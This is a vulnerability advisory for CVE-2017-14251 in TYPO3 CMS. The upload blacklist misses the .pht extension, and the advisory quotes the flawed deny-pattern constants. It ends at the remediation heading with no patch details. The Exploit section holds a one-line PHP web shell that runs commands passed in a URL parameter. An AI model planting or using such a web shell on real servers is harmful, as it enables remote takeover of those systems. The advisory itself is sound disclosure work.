Typo3 Unrestricted File Upload - Remote Code Execution

0 comments
Advisory Information 
Title: TYPO3 CMS Unrestricted File Upload
Release date: 01/12/2017
Last update: 01/12/2017
Credits: Maurizio Siddu, Emaze Networks S.p.A.

Vulnerability Information 
Class: Unrestricted File Upload, Remote Code Execution
CVE: 2017-14251
CVSSv2: 6.5

Affected Software 
  • TYPO3 CMS versions 7.6.0 to 7.6.21 and 8.0.0 to 8.7.4

Vulnerability Details
The TYPO3 CMS allows registered users to create and modify digital content, including the possibility to upload files or images.
Specifically the TYPO3 CMS uses a restriction mechanism based on a blacklist implemented  by the "fileDenyPattern" rule in the file "sysext/core/Classes/Core/SystemEnvironmentBuilder.php".


[...]
// Security related constant: Default value of fileDenyPattern
define('FILE_DENY_PATTERN_DEFAULT', '\\.(php[3-7]?|phpsh|phtml)(\\..*)?$|^\\.htaccess$');
// Security related constant: List of file extensions that should be registered as php script file extensions
define('PHP_EXTENSIONS_DEFAULT', 'php,php3,php4,php5,php6,php7,phpsh,inc,phtml');
[...]

The code above does not denies the files with the .PHT extension. This file extension is associated with the Partial Hypertext file format, and PHT files are handled as executable by default in various web server setups.


Exploit
This security issue could lead to Remote Code Execution, for example an attacker could use the File-Upload functionality of TYPO3 CMS to upload the following PHT file:


<?php echo shell_exec($_GET['cmd']); ?>

As result the uploaded file can be used to execute arbitrary commands on the remote system.


Remediation
Apply the security patches provided by the vendor: